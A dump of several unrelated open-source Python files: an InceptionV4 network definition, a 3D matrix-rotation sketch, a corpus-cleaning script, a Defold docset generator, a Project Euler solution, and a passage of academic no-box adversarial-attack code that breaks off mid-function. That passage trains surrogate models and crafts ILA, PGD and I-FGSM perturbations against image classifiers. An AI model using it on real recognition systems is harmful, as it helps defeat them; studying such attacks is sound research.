ConvBNLayer(\n 384,\n 64,\n 1,\n act=\"relu\",\n name=\"inception_a\" + name + \"_3x3_2_reduce\")\n self._conv4_2 = ConvBNLayer(\n 64,\n 96,\n 3,\n padding=1,\n act=\"relu\",\n name=\"inception_a\" + name + \"_3x3_2\")\n self._conv4_3 = ConvBNLayer(\n 96,\n 96,\n 3,\n padding=1,\n act=\"relu\",\n name=\"inception_a\" + name + \"_3x3_3\")\n\n def forward(self, inputs):\n pool1 = self._pool(inputs)\n conv1 = self._conv1(pool1)\n\n conv2 = self._conv2(inputs)\n\n conv3 = self._conv3_1(inputs)\n conv3 = self._conv3_2(conv3)\n\n conv4 = self._conv4_1(inputs)\n conv4 = self._conv4_2(conv4)\n conv4 = self._conv4_3(conv4)\n\n concat = paddle.concat([conv1, conv2, conv3, conv4], axis=1)\n return concat\n\n\nclass ReductionA(nn.Layer):\n def __init__(self):\n super(ReductionA, self).__init__()\n self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0)\n self._conv2 = ConvBNLayer(\n 384, 384, 3, stride=2, act=\"relu\", name=\"reduction_a_3x3\")\n self._conv3_1 = ConvBNLayer(\n 384, 192, 1, act=\"relu\", name=\"reduction_a_3x3_2_reduce\")\n self._conv3_2 = ConvBNLayer(\n 192, 224, 3, padding=1, act=\"relu\", name=\"reduction_a_3x3_2\")\n self._conv3_3 = ConvBNLayer(\n 224, 256, 3, stride=2, act=\"relu\", name=\"reduction_a_3x3_3\")\n\n def forward(self, inputs):\n pool1 = self._pool(inputs)\n conv2 = self._conv2(inputs)\n conv3 = self._conv3_1(inputs)\n conv3 = self._conv3_2(conv3)\n conv3 = self._conv3_3(conv3)\n concat = paddle.concat([pool1, conv2, conv3], axis=1)\n return concat\n\n\nclass InceptionB(nn.Layer):\n def __init__(self, name=None):\n super(InceptionB, self).__init__()\n self._pool = AvgPool2D(kernel_size=3, stride=1, padding=1)\n self._conv1 = ConvBNLayer(\n 1024, 128, 1, act=\"relu\", name=\"inception_b\" + name + \"_1x1\")\n self._conv2 = ConvBNLayer(\n 1024, 384, 1, act=\"relu\", name=\"inception_b\" + name + \"_1x1_2\")\n self._conv3_1 = ConvBNLayer(\n 1024,\n 192,\n 1,\n act=\"relu\",\n name=\"inception_b\" + name + \"_1x7_reduce\")\n self._conv3_2 = ConvBNLayer(\n 192,\n 224, (1, 7),\n padding=(0, 3),\n act=\"relu\",\n name=\"inception_b\" + name + \"_1x7\")\n self._conv3_3 = ConvBNLayer(\n 224,\n 256, (7, 1),\n padding=(3, 0),\n act=\"relu\",\n name=\"inception_b\" + name + \"_7x1\")\n self._conv4_1 = ConvBNLayer(\n 1024,\n 192,\n 1,\n act=\"relu\",\n name=\"inception_b\" + name + \"_7x1_2_reduce\")\n self._conv4_2 = ConvBNLayer(\n 192,\n 192, (1, 7),\n padding=(0, 3),\n act=\"relu\",\n name=\"inception_b\" + name + \"_1x7_2\")\n self._conv4_3 = ConvBNLayer(\n 192,\n 224, (7, 1),\n padding=(3, 0),\n act=\"relu\",\n name=\"inception_b\" + name + \"_7x1_2\")\n self._conv4_4 = ConvBNLayer(\n 224,\n 224, (1, 7),\n padding=(0, 3),\n act=\"relu\",\n name=\"inception_b\" + name + \"_1x7_3\")\n self._conv4_5 = ConvBNLayer(\n 224,\n 256, (7, 1),\n padding=(3, 0),\n act=\"relu\",\n name=\"inception_b\" + name + \"_7x1_3\")\n\n def forward(self, inputs):\n pool1 = self._pool(inputs)\n conv1 = self._conv1(pool1)\n\n conv2 = self._conv2(inputs)\n\n conv3 = self._conv3_1(inputs)\n conv3 = self._conv3_2(conv3)\n conv3 = self._conv3_3(conv3)\n\n conv4 = self._conv4_1(inputs)\n conv4 = self._conv4_2(conv4)\n conv4 = self._conv4_3(conv4)\n conv4 = self._conv4_4(conv4)\n conv4 = self._conv4_5(conv4)\n\n concat = paddle.concat([conv1, conv2, conv3, conv4], axis=1)\n return concat\n\n\nclass ReductionB(nn.Layer):\n def __init__(self):\n super(ReductionB, self).__init__()\n self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0)\n self._conv2_1 = ConvBNLayer(\n 1024, 192, 1, act=\"relu\", name=\"reduction_b_3x3_reduce\")\n self._conv2_2 = ConvBNLayer(\n 192, 192, 3, stride=2, act=\"relu\", name=\"reduction_b_3x3\")\n self._conv3_1 = ConvBNLayer(\n 1024, 256, 1, act=\"relu\", name=\"reduction_b_1x7_reduce\")\n self._conv3_2 = ConvBNLayer(\n 256,\n 256, (1, 7),\n padding=(0, 3),\n act=\"relu\",\n name=\"reduction_b_1x7\")\n self._conv3_3 = ConvBNLayer(\n 256,\n 320, (7, 1),\n padding=(3, 0),\n act=\"relu\",\n name=\"reduction_b_7x1\")\n self._conv3_4 = ConvBNLayer(\n 320, 320, 3, stride=2, act=\"relu\", name=\"reduction_b_3x3_2\")\n\n def forward(self, inputs):\n pool1 = self._pool(inputs)\n\n conv2 = self._conv2_1(inputs)\n conv2 = self._conv2_2(conv2)\n\n conv3 = self._conv3_1(inputs)\n conv3 = self._conv3_2(conv3)\n conv3 = self._conv3_3(conv3)\n conv3 = self._conv3_4(conv3)\n\n concat = paddle.concat([pool1, conv2, conv3], axis=1)\n\n return concat\n\n\nclass InceptionC(nn.Layer):\n def __init__(self, name=None):\n super(InceptionC, self).__init__()\n self._pool = AvgPool2D(kernel_size=3, stride=1, padding=1)\n self._conv1 = ConvBNLayer(\n 1536, 256, 1, act=\"relu\", name=\"inception_c\" + name + \"_1x1\")\n self._conv2 = ConvBNLayer(\n 1536, 256, 1, act=\"relu\", name=\"inception_c\" + name + \"_1x1_2\")\n self._conv3_0 = ConvBNLayer(\n 1536, 384, 1, act=\"relu\", name=\"inception_c\" + name + \"_1x1_3\")\n self._conv3_1 = ConvBNLayer(\n 384,\n 256, (1, 3),\n padding=(0, 1),\n act=\"relu\",\n name=\"inception_c\" + name + \"_1x3\")\n self._conv3_2 = ConvBNLayer(\n 384,\n 256, (3, 1),\n padding=(1, 0),\n act=\"relu\",\n name=\"inception_c\" + name + \"_3x1\")\n self._conv4_0 = ConvBNLayer(\n 1536, 384, 1, act=\"relu\", name=\"inception_c\" + name + \"_1x1_4\")\n self._conv4_00 = ConvBNLayer(\n 384,\n 448, (1, 3),\n padding=(0, 1),\n act=\"relu\",\n name=\"inception_c\" + name + \"_1x3_2\")\n self._conv4_000 = ConvBNLayer(\n 448,\n 512, (3, 1),\n padding=(1, 0),\n act=\"relu\",\n name=\"inception_c\" + name + \"_3x1_2\")\n self._conv4_1 = ConvBNLayer(\n 512,\n 256, (1, 3),\n padding=(0, 1),\n act=\"relu\",\n name=\"inception_c\" + name + \"_1x3_3\")\n self._conv4_2 = ConvBNLayer(\n 512,\n 256, (3, 1),\n padding=(1, 0),\n act=\"relu\",\n name=\"inception_c\" + name + \"_3x1_3\")\n\n def forward(self, inputs):\n pool1 = self._pool(inputs)\n conv1 = self._conv1(pool1)\n\n conv2 = self._conv2(inputs)\n\n conv3 = self._conv3_0(inputs)\n conv3_1 = self._conv3_1(conv3)\n conv3_2 = self._conv3_2(conv3)\n\n conv4 = self._conv4_0(inputs)\n conv4 = self._conv4_00(conv4)\n conv4 = self._conv4_000(conv4)\n conv4_1 = self._conv4_1(conv4)\n conv4_2 = self._conv4_2(conv4)\n\n concat = paddle.concat(\n [conv1, conv2, conv3_1, conv3_2, conv4_1, conv4_2], axis=1)\n\n return concat\n\n\nclass InceptionV4DY(nn.Layer):\n def __init__(self, class_num=1000):\n super(InceptionV4DY, self).__init__()\n self._inception_stem = InceptionStem()\n\n self._inceptionA_1 = InceptionA(name=\"1\")\n self._inceptionA_2 = InceptionA(name=\"2\")\n self._inceptionA_3 = InceptionA(name=\"3\")\n self._inceptionA_4 = InceptionA(name=\"4\")\n self._reductionA = ReductionA()\n\n self._inceptionB_1 = InceptionB(name=\"1\")\n self._inceptionB_2 = InceptionB(name=\"2\")\n self._inceptionB_3 = InceptionB(name=\"3\")\n self._inceptionB_4 = InceptionB(name=\"4\")\n self._inceptionB_5 = InceptionB(name=\"5\")\n self._inceptionB_6 = InceptionB(name=\"6\")\n self._inceptionB_7 = InceptionB(name=\"7\")\n self._reductionB = ReductionB()\n\n self._inceptionC_1 = InceptionC(name=\"1\")\n self._inceptionC_2 = InceptionC(name=\"2\")\n self._inceptionC_3 = InceptionC(name=\"3\")\n\n self.avg_pool = AdaptiveAvgPool2D(1)\n self._drop = Dropout(p=0.2, mode=\"downscale_in_infer\")\n stdv = 1.0 / math.sqrt(1536 * 1.0)\n self.out = Linear(\n 1536,\n class_num,\n weight_attr=ParamAttr(\n initializer=Uniform(-stdv, stdv), name=\"final_fc_weights\"),\n bias_attr=ParamAttr(name=\"final_fc_offset\"))\n\n def forward(self, inputs):\n x = self._inception_stem(inputs)\n\n x = self._inceptionA_1(x)\n x = self._inceptionA_2(x)\n x = self._inceptionA_3(x)\n x = self._inceptionA_4(x)\n x = self._reductionA(x)\n\n x = self._inceptionB_1(x)\n x = self._inceptionB_2(x)\n x = self._inceptionB_3(x)\n x = self._inceptionB_4(x)\n x = self._inceptionB_5(x)\n x = self._inceptionB_6(x)\n x = self._inceptionB_7(x)\n x = self._reductionB(x)\n\n x = self._inceptionC_1(x)\n x = self._inceptionC_2(x)\n x = self._inceptionC_3(x)\n\n x = self.avg_pool(x)\n x = paddle.squeeze(x, axis=[2, 3])\n x = self._drop(x)\n x = self.out(x)\n return x\n\n\ndef _load_pretrained(pretrained, model, model_url, use_ssld=False):\n if pretrained is False:\n pass\n elif pretrained is True:\n load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)\n elif isinstance(pretrained, str):\n load_dygraph_pretrain(model, pretrained)\n else:\n raise RuntimeError(\n \"pretrained type is not available. Please use `string` or `boolean` type.\"\n )\n\n\ndef InceptionV4(pretrained=False, use_ssld=False, **kwargs):\n model = InceptionV4DY(**kwargs)\n _load_pretrained(\n pretrained, model, MODEL_URLS[\"InceptionV4\"], use_ssld=use_ssld)\n return model\n","repo_name":"PaddlePaddle/PaddleClas","sub_path":"ppcls/arch/backbone/model_zoo/inception_v4.py","file_name":"inception_v4.py","file_ext":"py","file_size_in_byte":14944,"program_lang":"python","lang":"en","doc_type":"code","stars":5081,"dataset":"github-code","pt":"3"} +{"seq_id":"71020281362","text":"xmin = -10\nxmax = 10\n\nymin = -10\nymax = 10\n\nrangex = xmax - xmin\nrangey = ymax - ymin\n\nfmatrix = [[0,0,0],[1,0,0],[1,2,0],[2,2,0],[2,3,0],[1,3,0],[1,4,0],[3,4,0],[3,5,0],[0,5,0],\n [0,0,1],[1,0,1],[1,2,1],[2,2,1],[2,3,1],[1,3,1],[1,4,1],[3,4,1],[3,5,1],[0,5,1]]\nedges = [[0,1],[1,2],[2,3],[3,4],[4,5],[5,6],[6,7],\n [7,8],[8,9],[9,0],\n [10,11],[11,12],[12,13],[13,14],[14,15],[15,16],[16,17],\n [17,18],[18,19],[19,10],\n [0,10],[1,11],[2,12],[3,13],[4,14],[5,15],[6,16],[7,17],\n [8,18],[9,19]]\n\ntransformation_matrix = [[0,-1],[1,0]]\n\ndef setup():\n global xscl, yscl\n size(600,600)\n xscl= width/rangex\n yscl= -height/rangey\n noFill()\n\ndef draw():\n global xscl, yscl\n background(255)\n translate(width/2,height/2)\n grid(xscl, yscl)\n\n strokeWeight(2)\n stroke(0)\n graphPoints(fmatrix,edges)\n\n rot = map(mouseX,0,width,0,TWO_PI)\n tilt = map(mouseY,0,height,0,TWO_PI)\n newmatrix = transpose(multmatrix(rottilt(rot,tilt),transpose(fmatrix)))\n stroke(255,0,0)\n graphPoints(newmatrix,edges)\n\n\ndef grid(xscl,yscl):\n strokeWeight(1)\n stroke(0,255,255)\n for i in range(xmin,xmax+1):\n line(i*xscl,ymin*yscl,i*xscl,ymax*yscl)\n for i in range(ymin,ymax+1):\n line(xmin*xscl,i*yscl,xmax*xscl,i*yscl)\n stroke(0)\n line(0,ymin*yscl,0,ymax*yscl)\n line(xmin*xscl,0,xmax*xscl,0)\n\ndef graphPoints(pointList,edges):\n for e in edges:\n line(pointList[e[0]][0]*xscl,pointList[e[0]][1]*yscl,\n pointList[e[1]][0]*xscl,pointList[e[1]][1]*yscl)\n\ndef addMatrices(a,b):\n C = [[a[0][0]+b[0][0],a[0][1]+b[0][1]],\n [a[1][0]+b[1][0],a[1][1]+b[1][1]]]\n return C\n\ndef multmatrix(a,b):\n m = len(a)\n n = len(b[0])\n newmatrix = []\n for i in range(m):\n row = []\n for j in range(n):\n sum1 = 0\n for k in range(len(b)):\n sum1 += a[i][k]*b[k][j]\n row.append(sum1)\n newmatrix.append(row)\n return newmatrix\n\ndef rottilt(rot,tilt):\n rotmatrix_Y = [[cos(rot),0.0,sin(rot)],\n [0.0,1.0,0.0],\n [-sin(rot),0.0,cos(rot)]]\n rotmatrix_X = [[1.0,0.0,0.0],\n [0.0,cos(tilt),sin(tilt)],\n [0.0,-sin(tilt),cos(tilt)]]\n return multmatrix(rotmatrix_Y,rotmatrix_X)\n\ndef transpose(a):\n output = []\n m = len(a)\n n = len(a[0])\n for i in range(n):\n output.append([])\n for j in range(m):\n # 把a[j][i]赋给output[i][j]\n output[i].append(a[j][i])\n return output","repo_name":"alarm10086/python_learn_math","sub_path":"s2/p8/p8_10/matrices3D.pyde","file_name":"matrices3D.pyde","file_ext":"pyde","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22799988650","text":"#! /usr/bin/python3\n\nimport argparse\nimport logging\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--input-src\", type=str, help=\"Source input file\", required=True)\n parser.add_argument(\"--input-trg\", type=str, help=\"Target input file\", required=True)\n\n parser.add_argument(\"--output-src\", type=str, help=\"Source output file\", required=True)\n parser.add_argument(\"--output-trg\", type=str, help=\"Target output file\", required=True)\n\n args = parser.parse_args()\n\n return args\n\n\ndef main():\n\n args = parse_args()\n\n logging.basicConfig(level=logging.DEBUG)\n logging.debug(args)\n\n total = 0\n skipped = 0\n\n with open(args.input_src, \"r\") as handle_input_src, \\\n open(args.input_trg, \"r\") as handle_input_trg, \\\n open(args.output_src, \"w\") as handle_output_src, \\\n open(args.output_trg, \"w\") as handle_output_trg:\n\n for src_line, trg_line in zip(handle_input_src, handle_input_trg):\n\n if src_line.strip() == \"\" or trg_line.strip() == \"\":\n skipped += 1\n else:\n handle_output_src.write(src_line)\n handle_output_trg.write(trg_line)\n\n total += 1\n\n logging.debug(\"Skipped %d parallel lines out of %d total.\" % (skipped, total))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ZurichNLP/understanding-mbr","sub_path":"scripts/remove_if_source_or_target_empty.py","file_name":"remove_if_source_or_target_empty.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"12082412643","text":"#!/usr/bin/env python3\nfrom urllib.request import urlopen\nfrom subprocess import call\n\nimport os\nimport re\nimport sys\nimport json\nimport shutil\nimport urllib\nimport sqlite3\nimport zipfile\nimport string\n\n# path definitions\nREF_PATH = \"ref\"\nJSON_PATH = \"json\"\n\n# filenames definitions\nDOC_ZIP = \"refdoc.zip\"\nDB_FILE = \"docset.dsidx\"\n\ndef get():\n\tsys.stdout.write(\"Downloading...\")\n\tinfo_file = urlopen(\"http://d.defold.com/stable/info.json\")\n\tinfo = json.loads(urlopen(\"http://d.defold.com/stable/info.json\").read())\n\tinfo_file.close()\n\tos.remove(DOC_ZIP) if os.path.exists(DOC_ZIP) else None\n\turllib.request.urlretrieve(\"http://d.defold.com/archive/\" + info[\"sha1\"] + \"/engine/share/ref-doc.zip\", DOC_ZIP)\n\ndef cleanup():\n\tsys.stdout.write(\"Cleaning...\")\n\tshutil.rmtree(JSON_PATH) if os.path.exists(JSON_PATH) else None\n\tos.remove(DOC_ZIP) if os.path.exists(DOC_ZIP) else None\n\tos.remove(DB_FILE) if os.path.exists(DB_FILE) else None\n\ndef unzip():\n\tsys.stdout.write(\"Unpacking...\")\n\tshutil.rmtree(JSON_PATH) if os.path.exists(JSON_PATH) else None\n\twith zipfile.ZipFile(DOC_ZIP) as zf: zf.extractall(JSON_PATH)\n\ndef create():\n\tsys.stdout.write(\"Creating...\")\n\n\t# create all paths\n\tshutil.rmtree(REF_PATH) if os.path.exists(REF_PATH) else None\n\tos.makedirs(REF_PATH)\n\n\t# create sqlite db\n\twith sqlite3.connect(\"docset.dsidx\") as db:\n\n\t\tcursor = db.cursor()\n\t\ttry: cursor.execute('DROP TABLE searchIndex;')\n\t\texcept: pass\n\n\t\tcursor.execute('CREATE TABLE searchIndex(id INTEGER PRIMARY KEY, name TEXT, type TEXT, path TEXT);')\n\t\t# make sure duplicates are ignored\n\t\t# cursor.execute('CREATE UNIQUE INDEX anchor ON searchIndex (name, type, path);')\n\n\t\tindex_html = \"\"\n\n\t\tfor root, dir, files in os.walk(JSON_PATH):\n\n\t\t\tfor file in files:\n\n\t\t\t\twith open(os.path.join(root, file), \"r\") as fh:\n\n\t\t\t\t\tif file.endswith(\".json\"):\n\t\t\t\t\t\tclass_name = file.replace(\"_doc.json\", \"\")\n\t\t\t\t\t\tclass_path = class_name + \".html\"\n\t\t\t\t\t\tclass_doc = \"\"\n\n\t\t\t\t\t\tparsed_json = json.load(fh)\n\t\t\t\t\t\tinfo = parsed_json[\"info\"]\n\t\t\t\t\t\tclass_doc = class_doc + \"
\" + info[\"name\"] + \"
\\n\"\n\t\t\t\t\t\tclass_doc = class_doc + \"\" + info[\"description\"] + \"
\\n\"\n\t\t\t\t\t\tindex_html = index_html + \"\" + class_name + \"\" + info[\"brief\"] + \"\"\n\n\t\t\t\t\t\tfor element in parsed_json[\"elements\"]:\n\t\t\t\t\t\t\tfunction_name = element[\"name\"]\n\n\t\t\t\t\t\t\tif function_name != \"\":\n\t\t\t\t\t\t\t\tentry_type = \"Function\"\n\n\t\t\t\t\t\t\t\tif element[\"type\"] == \"VARIABLE\":\n\t\t\t\t\t\t\t\t\tentry_type = \"Variable\"\n\n\t\t\t\t\t\t\t\telif element[\"type\"] == \"MESSAGE\":\n\t\t\t\t\t\t\t\t\tentry_type = \"Command\"\n\n\t\t\t\t\t\t\t\telif element[\"type\"] == \"PROPERTY\":\n\t\t\t\t\t\t\t\t\tentry_type = \"Property\"\n\n\t\t\t\t\t\t\t\telif element[\"type\"] == \"MACRO\":\n\t\t\t\t\t\t\t\t\tentry_type = \"Macro\"\n\n\t\t\t\t\t\t\t\telif element[\"type\"] == \"TYPEDEF\":\n\t\t\t\t\t\t\t\t\tentry_type = \"Type\"\n\n\t\t\t\t\t\t\t\telif element[\"type\"] == \"ENUM\":\n\t\t\t\t\t\t\t\t\tentry_type = \"Enum\"\n\n\t\t\t\t\t\t\t\tfunction_path = class_path + \"#\" + function_name\n\t\t\t\t\t\t\t\tclass_doc = class_doc + \"\" + function_name + (\"()\" if entry_type == \"Function\" else \"\") + \"
\"\n\t\t\t\t\t\t\t\tclass_doc = class_doc + \"\" + element[\"description\"] + \"
\"\n\n\t\t\t\t\t\t\t\tif element.get(\"note\", \"\") != \"\":\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"Note: \" + element[\"note\"] + \"
\"\n\n\t\t\t\t\t\t\t\tif len(element[\"parameters\"]) > 0:\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"PARAMETERS
\"\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"\" + parameter[\"name\"] + parameter[\"doc\"] + \"
\"\n\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"MEMBERS
\"\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"\" + member[\"name\"] + \" - \" + member[\"doc\"] + \"
\"\n\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"RETURN
\"\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"\" + returnvalue[\"name\"] + \" - \" + returnvalue[\"doc\"] + \"
\"\n\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"EXAMPLES
\"\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"\" + element[\"examples\"] + \"
\"\n\t\t\t\t\t\t\t\t\tclass_doc = class_doc + \"\"\n\t\t\t\t\t\t\t\tcursor.execute('INSERT OR IGNORE INTO searchIndex(name, type, path) VALUES (?,?,?)', (function_name, entry_type, \"ref/\" + function_path))\n\n\t\t\t\t\t\twith open(os.path.join(REF_PATH, class_path), \"w\") as out:\n\t\t\t\t\t\t\tout.write(\"\")\n\t\t\t\t\t\t\tout.write(\"\")\n\t\t\t\t\t\t\tout.write(class_doc.replace(\"\")\n\n\t\t\t\t\t\tcursor.execute('INSERT OR IGNORE INTO searchIndex(name, type, path) VALUES (?,?,?)', (class_name, 'Module', \"ref/\" + class_path))\n\n\t\twith open(os.path.join(\".\", \"index.html\"), \"w\") as out:\n\t\t\tout.write(\"\")\n\t\t\tout.write(index_html)\n\t\t\tout.write(\"\")\n\nget()\nunzip()\ncreate()\ncleanup()\nprint(\"DONE!\")\n","repo_name":"otapliger/defold-api","sub_path":"defold/createdocset.py","file_name":"createdocset.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5981473881","text":"from math import ceil,sqrt\n\nK = 12000\n# minPS[k] is minPS for k=k\nminPS = [float('Inf') for _ in range(K+1)]\n\n#T = [ [],\n #[],\n #[],\n #[],\n #[2]\n #]\n\nT = [ [1] for _ in range(K*3) ]\n\nfor k in range(4,K*3):\n for fac in range(2,ceil(sqrt(k))+1):\n if k == int(k/fac)*fac:\n diff = k-(int(k/fac)+fac)\n for p in T[fac]:\n for q in T[int(k/fac)]:\n T[k].append(p+q+diff)\n if (p+q+diff) >= len(minPS):\n continue\n minPS[p+q+diff] = min(minPS[p+q+diff],k)\n\nprint(sum(set([ps for ps in minPS if ps!=float('Inf')])))\n\n","repo_name":"hjtran/project_euler","sub_path":"p088.py","file_name":"p088.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1309312417","text":"### from https://github.com/qizhangli/nobox-attacks\n\nimport os\nimport time\nimport argparse\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.backends import cudnn\n\nfrom attacks.no_box.utils import *\n\nimport torchvision\nimport torchvision.transforms as T\n\n## TRAIN\n\ndef train_unsupervised(\n model, optimizer, permute_fun,\n iter_ind, img,\n n_iters\n):\n img_input = img\n img_tar = img.clone()\n since = time.time()\n # mini-batch - img is a single batch, we're fitting to it\n for i in range(n_iters):\n for img_ind in range(img_input.shape[0]):\n permute_fun(img_input, img_ind)\n # if args.mode == 'rotate':\n # img_input[img_ind:img_ind + 1] = rot(img_input[img_ind:img_ind + 1])\n # elif args.mode == 'jigsaw':\n # img_input[img_ind] = shuffle(img_input[img_ind], 1)\n outputs, _ = model(img_input)\n loss = nn.MSELoss()(outputs[0], img_tar)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print(iter_ind + 1, i + 1, round(loss.item(), 5), '{} s'.format(int(time.time() - since)))\n return model\n\n# TODO: fix. Need to get the prototype_inds working\ndef train_prototypical(\n model, optimizer, \n iter_ind, img,\n batch_size, n_imgs_per_person, \n n_decoders, n_iters, \n # prototype_ind_csv_writer,\n do_aug,\n):\n # if n_imgs_per_person == 1:\n # tar_ind_ls = [0, 1]\n # else:\n # tar_ind_ls = mk_proto_ls(n_imgs_per_person, batch_size)\n # tar_ind_ls = tar_ind_ls[:n_decoders * 2]\n # print(tar_ind_ls.tolist())\n tar_ind_ls = [0, n_imgs_per_person]# + [1]*n_imgs_per_person\n # print(tar_ind_ls)\n # prototype_ind_csv_writer.writerow(tar_ind_ls.tolist())\n img_tar = img[tar_ind_ls]\n if n_decoders != 1:\n img_tar = F.interpolate(img_tar, (56, 56))\n since = time.time()\n for i in range(n_iters):\n rand_ind = torch.cat(\n (\n torch.randint(0, n_imgs_per_person, size=(1,)), \n torch.randint(n_imgs_per_person, batch_size, size=(1,))\n )\n )\n img_input = img[rand_ind].clone()\n\n if do_aug:\n img_input = aug(img_input)\n \n assert img_input.shape[3] == 224\n \n outputs, _ = model(img_input)\n gen_img = torch.cat(outputs, dim=0)\n loss = nn.MSELoss()(gen_img, img_tar)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if (i + 1) % 100 == 0:\n print(iter_ind + 1, i + 1, round(loss.item(), 5), '{} s'.format(int(time.time() - since)))\n return model\n\ndef train_supervised(\n model, optimizer, \n iter_ind, img,\n batch_size, n_imgs_per_person, \n n_iters, \n do_aug,\n):\n target = [0]*n_imgs_per_person + [1]*n_imgs_per_person\n # print(tar_ind_ls)\n # prototype_ind_csv_writer.writerow(tar_ind_ls.tolist())\n # img_tar = img[tar_ind_ls]\n # if n_decoders != 1:\n # img_tar = F.interpolate(img_tar, (56, 56))\n since = time.time()\n for i in range(n_iters):\n rand_ind = torch.randint(0, batch_size, size=(1,))\n \n iter_input = img[rand_ind].clone()\n iter_target = target[rand_ind].clone()\n\n if do_aug:\n iter_input = aug(iter_input)\n \n assert iter_input.shape[3] == 224\n \n outputs, _ = model(iter_input)\n if i == 0:\n print('model outputs, targets:', outputs, iter_target)\n\n # gen_img = torch.cat(outputs, dim=0)\n loss = nn.MSELoss()(outputs, iter_target)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if (i + 1) % 100 == 0:\n print('model outputs, targets:', outputs, iter_target)\n print(iter_ind + 1, i + 1, round(loss.item(), 5), '{} s'.format(int(time.time() - since)))\n\n return model\n\ndef train_loop(\n device,\n n_decoders, surrogate, lr, n_iters, mode,\n data_loader, batch_size, n_imgs_per_person, save_dir,\n start_idx, end_idx,\n force_retrain\n):\n if mode == 'naive':\n permute = naive\n if mode == 'jigsaw':\n permute = jigsaw\n if mode == 'rotate':\n permute = rotate\n\n for iter_ind, (img, targ) in enumerate(data_loader):\n if not start_idx <= iter_ind < end_idx:\n continue\n\n model_name = save_dir.split('/')[-2:]\n model_save_dir = os.path.join(save_dir, 'models', '{}.pth'.format(iter_ind))\n if not force_retrain and os.path.exists(model_save_dir):\n print('Model [{} {}] [{}] already trained, not re-running'.format(\n model_name[0], model_name[1], iter_ind\n ))\n continue\n print('Training model [{} {}] [{}]'.format(\n model_name[0], model_name[1], iter_ind\n ))\n\n model = initialize_model(surrogate, n_decoders, device)\n\n model.train()\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n img = img.to(device)\n\n if mode == 'supervised':\n train_supervised(\n model, optimizer,\n iter_ind, img,\n batch_size, n_imgs_per_person,\n n_iters,\n True\n )\n elif mode == 'prototypical':\n train_prototypical(\n model, optimizer, \n iter_ind, img,\n batch_size, n_imgs_per_person, \n n_decoders, n_iters, \n True\n )\n else:\n model = train_unsupervised(\n model=model, \n optimizer=optimizer, \n permute_fun=permute, \n iter_ind=iter_ind, \n img=img, \n n_iters=n_iters\n )\n\n model.eval()\n torch.save(model.state_dict(), model_save_dir)\n\n## ATTACK\ndef attack_ila(model, device, ori_img, tar_img, attack_niters, eps):\n model.eval()\n ori_img = ori_img.to(device)\n img = ori_img.clone()\n with torch.no_grad():\n _, tar_h_feats = model(tar_img)\n _, ori_h_feats = model(ori_img)\n for i in range(attack_niters):\n img.requires_grad_(True)\n _, att_h_feats = model(img)\n loss = ILA()(ori_h_feats.detach(), tar_h_feats.detach(), att_h_feats)\n if (i+1) % 50 == 0:\n print('\\r ila attacking {}, {:0.4f}'.format(i+1, loss.item()),end=' ')\n loss.backward()\n input_grad = img.grad.data.sign()\n img = img.data + 1. / 255 * input_grad\n img = torch.where(img > ori_img + eps, ori_img + eps, img)\n img = torch.where(img < ori_img - eps, ori_img - eps, img)\n img = torch.clamp(img, min=0, max=1)\n print('')\n return img.data\n\ndef attack_ce_unsupervised(\n model, device, \n ori_img, \n attack_niters, eps, alpha, \n batch_size, n_imgs_per_person,\n ce_method\n):\n model.eval()\n ori_img = ori_img.to(device)\n nChannels = 3\n tar_img = []\n for i in range(n_imgs_per_person):\n tar_img.append(ori_img[[i, n_imgs_per_person + i]])\n for i in range(n_imgs_per_person):\n tar_img.append(ori_img[[n_imgs_per_person+i, i]])\n tar_img = torch.cat(tar_img, dim=0)\n tar_img = tar_img.reshape(batch_size,2,nChannels,224,224)\n img = ori_img.clone()\n\n if ce_method == 'pgd':\n # In our implementation of PGD, we incorporate randomness at each iteration to further enhance the transferability\n method = lambda img : img + img.new(img.size()).uniform_(-eps, eps)\n elif ce_method == 'ifgsm':\n method = lambda img : img\n\n for i in range(attack_niters):\n img_x = method(img)\n img_x.requires_grad_(True)\n outs, _ = model(img_x)\n outs = outs[0].unsqueeze(1).repeat(1, 2, 1, 1, 1)\n loss_mse_ = nn.MSELoss(reduction='none')(outs, tar_img).sum(dim = (2,3,4)) / (nChannels*224*224)\n loss_mse = - alpha * loss_mse_\n label = torch.tensor([0]*batch_size).long().to(device)\n loss = nn.CrossEntropyLoss()(loss_mse,label)\n if (i+1) % 50 == 0 or i == 0:\n print('\\r attacking {}, {:0.4f}'.format(i, loss.item()), end=' ')\n loss.backward()\n input_grad = img_x.grad.data.sign()\n img = img.data + 1. / 255 * input_grad\n img = torch.where(img > ori_img + eps, ori_img + eps, img)\n img = torch.where(img < ori_img - eps, ori_img - eps, img)\n img = torch.clamp(img, min=0, max=1)\n print('')\n return img.data\n\ndef attack_ce_supervised(\n model, device, \n ori_img, \n attack_niters, eps, 